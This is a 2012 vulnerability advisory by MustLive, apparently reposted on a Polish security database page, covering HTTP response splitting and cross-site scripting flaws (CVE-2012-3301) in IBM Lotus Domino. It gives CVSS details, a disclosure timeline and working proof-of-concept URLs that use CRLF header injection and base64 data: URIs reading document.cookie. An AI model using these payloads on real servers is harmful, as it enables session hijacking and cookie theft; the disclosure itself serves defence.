IBM Lotus Domino HTTP Response Splitting and Cross-Site Scripting

2012.09.07

Credit: MustLive

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2012-3301

CWE: CWE-79
CWE-20

Ogólna skala CVSS: 4.3/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Częściowy

Wpływ na dostępność: Brak

I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. At 15th 
of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3301.

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and 
IBM are still working on other vulnerabilities, about which I've informed them.

For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

----------
Details:
----------

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Will work in all versions of Firefox, but without access to cookies:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

Also there can be used Location header for XSS attack (for which there are its own nuances of work in different 
browsers).

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URI.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

In x.nsf, "x" means username of logged in user.

------------
Timeline:
------------ 

Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the 
developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from 
total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Referencje:

http://websecurity.com.ua/5839/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

IBM Lotus Domino HTTP Response Splitting and Cross-Site Scripting

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.